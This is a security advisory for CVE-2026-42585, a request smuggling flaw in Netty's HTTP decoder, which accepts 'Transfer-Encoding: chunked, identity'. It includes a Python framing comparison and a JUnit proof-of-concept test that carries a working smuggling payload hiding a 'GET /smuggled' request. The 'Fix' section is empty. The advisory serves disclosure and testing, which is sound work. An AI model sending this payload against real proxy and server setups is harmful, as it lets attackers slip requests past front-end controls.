PT-2026-38377 · Maven · io.netty:netty-codec-http

Published 2026-05-07 · Updated 2026-05-07 · CVE-2026-42585

CVSS v3.1: 6.5 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Summary

Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks.

Details

Netty incorrectly marks a request as chunked when the malformed header "Transfer-Encoding: chunked, identity" is present, i.e. when chunked is not the final transfer coding. RFC 9112, section 6.3 (https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length) requires the opposite:
"If a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding, the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request) status code and then close the connection."
A possible scenario is Netty sitting behind a proxy that does not reject requests carrying "Transfer-Encoding: chunked, identity" but frames the body by Content-Length and forwards the bytes to Netty unchanged. The proxy then sees a single request with a 48-byte body, while Netty terminates the body at the "0" chunk and parses the remaining bytes as a second request.
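To make the framing disagreement concrete, the following is an added example (not Netty's code, and not part of the original advisory): a small message-framing routine that applies the RFC 9112 section 6.3 rules to the PoC bytes under three policies, the Content-Length-preferring proxy from the scenario above, a lenient parser that treats any occurrence of "chunked" as chunked framing (the behaviour the advisory attributes to Netty), and the strict RFC rule. The policy names, the helper functions and the constructed POC byte string are assumptions of this example; the request bytes themselves are the ones from the PoC.

```python
# Added example (not Netty's code): RFC 9112 section 6.3 message framing,
# applied to the advisory's PoC bytes under three parser policies, to show
# why a Content-Length-preferring proxy and a lenient chunked parser desync.

CRLF = b"\r\n"


class BadRequest(Exception):
    """Raised where RFC 9112 requires a 400 response and a connection close."""


def parse_head(raw: bytes, start: int = 0):
    """Return (request_line, [(name, value), ...], body_offset) for the message
    starting at `start`. Header names are lower-cased for lookup."""
    end = raw.find(CRLF + CRLF, start)
    if end < 0:
        raise ValueError("incomplete message head")
    lines = raw[start:end].decode("ascii").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, end + len(CRLF + CRLF)


def chunked_body_end(raw: bytes, pos: int) -> int:
    """Offset just past a chunked body. Chunk extensions are ignored; trailer
    fields are not supported (the PoC sends none)."""
    while True:
        line_end = raw.find(CRLF, pos)
        if line_end < 0:
            raise ValueError("incomplete chunk-size line")
        size = int(raw[pos:line_end].split(b";")[0].strip(), 16)
        pos = line_end + len(CRLF)
        if size == 0:
            # last-chunk is followed by an (empty) trailer section and a CRLF
            if raw[pos:pos + len(CRLF)] != CRLF:
                raise ValueError("trailer fields not supported")
            return pos + len(CRLF)
        pos += size
        if raw[pos:pos + len(CRLF)] != CRLF:
            raise ValueError("chunk-data not followed by CRLF")
        pos += len(CRLF)


def frame_message(raw: bytes, start: int, policy: str):
    """Return (request_line, body_end) for the message at `start`.

    "rfc9112":         Transfer-Encoding wins over Content-Length and chunked
                       must be the final coding, otherwise 400 and close.
    "lenient-chunked": chunked framing whenever "chunked" appears anywhere in
                       Transfer-Encoding (the behaviour the advisory describes).
    "content-length":  the proxy from the Details section, which frames by
                       Content-Length and does not reject the request.
    """
    request_line, headers, body_start = parse_head(raw, start)
    codings = [c.strip().lower()
               for n, v in headers if n == "transfer-encoding"
               for c in v.split(",")]
    lengths = [int(v) for n, v in headers if n == "content-length"]
    by_length = body_start + (lengths[0] if lengths else 0)

    if policy == "rfc9112":
        if not codings:
            return request_line, by_length
        if codings[-1] != "chunked":
            raise BadRequest("chunked is not the final transfer coding")
        return request_line, chunked_body_end(raw, body_start)
    if policy == "lenient-chunked":
        if "chunked" in codings:
            return request_line, chunked_body_end(raw, body_start)
        return request_line, by_length
    if policy == "content-length":
        return request_line, by_length
    raise ValueError(f"unknown policy {policy!r}")


def split_requests(raw: bytes, policy: str) -> list:
    """Request lines of every message a parser using `policy` reads from raw."""
    seen, pos = [], 0
    while pos < len(raw):
        request_line, pos = frame_message(raw, pos, policy)
        seen.append(request_line)
    return seen


# The PoC bytes, constructed inline. Content-Length 48 covers the terminating
# "0" chunk and its CRLFs (5 bytes) plus the 43-byte smuggled GET.
POC = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked, identity\r\n"
    b"Content-Length: 48\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"\r\n"
)


def desync_report(raw: bytes = POC) -> dict:
    """What each party reads from the same byte stream."""
    report = {
        "proxy (Content-Length)": split_requests(raw, "content-length"),
        "lenient chunked parser": split_requests(raw, "lenient-chunked"),
    }
    try:
        report["RFC 9112 strict"] = split_requests(raw, "rfc9112")
    except BadRequest as e:
        report["RFC 9112 strict"] = f"400 Bad Request: {e}"
    return report


if __name__ == "__main__":
    for party, result in desync_report().items():
        print(f"{party:24s} -> {result}")
```

The proxy policy yields one POST, the lenient policy yields the POST followed by "GET /smuggled HTTP/1.1", and the strict policy rejects the message, which is the only outcome that closes the desync.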

PoC

The test below shows Netty decoding the bytes after the terminating "0" chunk as a second, successfully parsed request, demonstrating how an attacker can smuggle a request inside the body of the first one. The Content-Length of 48 covers exactly the "0" chunk and the smuggled GET, so a proxy that frames by Content-Length forwards both as one request.

// JUnit 5 imports assumed; the assertions also work with JUnit 4.
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertTrue;

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.HttpRequest;
import io.netty.handler.codec.http.HttpRequestDecoder;
import io.netty.handler.codec.http.LastHttpContent;
import io.netty.util.CharsetUtil;
import org.junit.jupiter.api.Test;

  @Test
  public void test() {
    // One byte stream: a POST whose Content-Length (48) spans the terminating
    // "0" chunk plus a complete GET that follows it.
    String requestStr = "POST / HTTP/1.1\r\n" +
        "Host: localhost\r\n" +
        "Transfer-Encoding: chunked, identity\r\n" +
        "Content-Length: 48\r\n" +
        "\r\n" +
        "0\r\n" +
        "\r\n" +
        "GET /smuggled HTTP/1.1\r\n" +
        "Host: localhost\r\n" +
        "\r\n";

    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1: decoded as chunked; the decoder drops Content-Length in favour
    // of Transfer-Encoding instead of rejecting the request with a 400.
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    assertTrue(request.headers().contains("Transfer-Encoding"));
    assertFalse(request.headers().contains("Content-Length"));
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2: the bytes the proxy counted as body are parsed as GET /smuggled.
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
  }

Impact

HTTP Request Smuggling: an attacker injects arbitrary HTTP requests that the front-end proxy never sees as separate requests.

Fix

Weakness Enumeration

HTTP Request/Response Smuggling

Related Identifiers

CVE-2026-42585
GHSA-38F8-5428-X5CV

Affected Products

io.netty:netty-codec-http